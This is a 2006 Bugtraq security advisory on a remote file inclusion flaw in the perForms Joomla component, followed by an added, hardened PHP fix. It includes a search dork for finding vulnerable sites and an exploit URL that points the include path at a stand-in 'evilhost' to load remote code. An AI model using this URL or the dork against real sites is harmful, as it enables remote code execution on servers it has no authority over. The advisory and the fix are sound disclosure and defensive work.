Date: 13 Jul 2006 19:34:00 -0000
From: endeneu@...uxmail.com
To: bugtraq@...urityfocus.com
Subject: perForms  <= 1.0 ([mosConfig_absolute_path]) Remote File Inclusion


---------------------------------------------------------------------------
 perForms  <= 1.0 ([mosConfig_absolute_path]) Remote File Inclusion
---------------------------------------------------------------------------

 Remote : Yes
 Critical Level : High

 Vuln found in a log file: lazy 0day!!! :D



 Description:
 ~~~~~~~~~~~~

 Application :  perForms Joomla Component
 Version : latest version [1.0]
 URL : http://forge.joomla.org/sf/projects/performs

 Variable $mosConfig_absolute_path is not sanitized: xpl works with register_globals=on

 in /components/com_performs/com_performs/performs.php on lines 6-10

 require_once( $mosConfig_absolute_path."/administrator/components/com_performs/lib/lib_template.php" );
 require_once( $mosConfig_absolute_path."/administrator/components/com_performs/lib/lib_valid.php" );
 require_once( $mosConfig_absolute_path."/administrator/components/com_performs/lib/lib_phpForm.php" );
 require_once( $mosConfig_absolute_path."/administrator/components/com_performs/lib/myLib.php" );
 require_once($mosConfig_absolute_path."/administrator/components/com_performs/class.performs.php");


 Exploit:
 ~~~~~~~~
 
 dork: inurl:"com_performs" -> finds ~12.000 sites (!)

 http://www.vuln.com/components/com_performs/performs.php?mosConfig_absolute_path=http://evilhost


 Fix
 ~~~~

 Add before the code:

 defined('_VALID_MOS') or die('Direct access to this location is not allowed.');


 Thx
 ~~~~

 Who works for better code and better life!


----------------------------------------------------------------------------------------------------
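Added example (not from the original advisory or the perForms project): a hardened version of the component entry point whose include lines are quoted above. It keeps the `_VALID_MOS` guard the advisory recommends and additionally stops deriving the include prefix from a global that a request can overwrite. The directory layout (`<site>/components/com_performs/com_performs/performs.php`, with the libraries under `administrator/components/com_performs/`) is taken from the advisory; the Joomla 1.0 bootstrap that defines `_VALID_MOS` is assumed, not reproduced.

```php
<?php
// Added example, not code from the advisory or the perForms project.
// Hardened entry point for components/com_performs/com_performs/performs.php.

// 1. Refuse direct HTTP access. Joomla 1.0's own index.php defines _VALID_MOS
//    before it loads a component, so a request that hits this file directly
//    never has it set and stops here before any include is evaluated.
defined('_VALID_MOS') or die('Direct access to this location is not allowed.');

// 2. Do not build include paths from $mosConfig_absolute_path. With
//    register_globals=on, ?mosConfig_absolute_path=... populates that global
//    from the query string. A prefix anchored to this file's own location
//    cannot be influenced by request data, whatever register_globals is set to.
//    Assumed layout: this file lives three directories below the site root.
$base = realpath(dirname(__FILE__) . '/../../..');
if ($base === false) {
    die('Unable to resolve the site root.');
}

// 3. Allow-list the exact library files the component needs (paths from the
//    advisory) so that no later change can turn this into an arbitrary include.
$libs = array(
    'administrator/components/com_performs/lib/lib_template.php',
    'administrator/components/com_performs/lib/lib_valid.php',
    'administrator/components/com_performs/lib/lib_phpForm.php',
    'administrator/components/com_performs/lib/myLib.php',
    'administrator/components/com_performs/class.performs.php',
);

foreach ($libs as $rel) {
    $path = realpath($base . '/' . $rel);
    // realpath() collapses '..' and symlinks and returns false for anything
    // that is not a local file, so a URL or stream wrapper can never pass.
    // The prefix check keeps the resolved file under the site root.
    if ($path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0
        || !is_file($path)) {
        die('Required component library missing or outside the site root.');
    }
    require_once $path;
}
```

The code-level guard is the fix the advisory asks for; the path handling is defence in depth on top of it. On the server side, the same class of bug is also blunted by `register_globals = Off` (so query parameters never become PHP globals) and by `allow_url_fopen = Off` (or, on PHP 5.2 and later, `allow_url_include = Off`), which makes `require_once` refuse remote URLs altogether.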

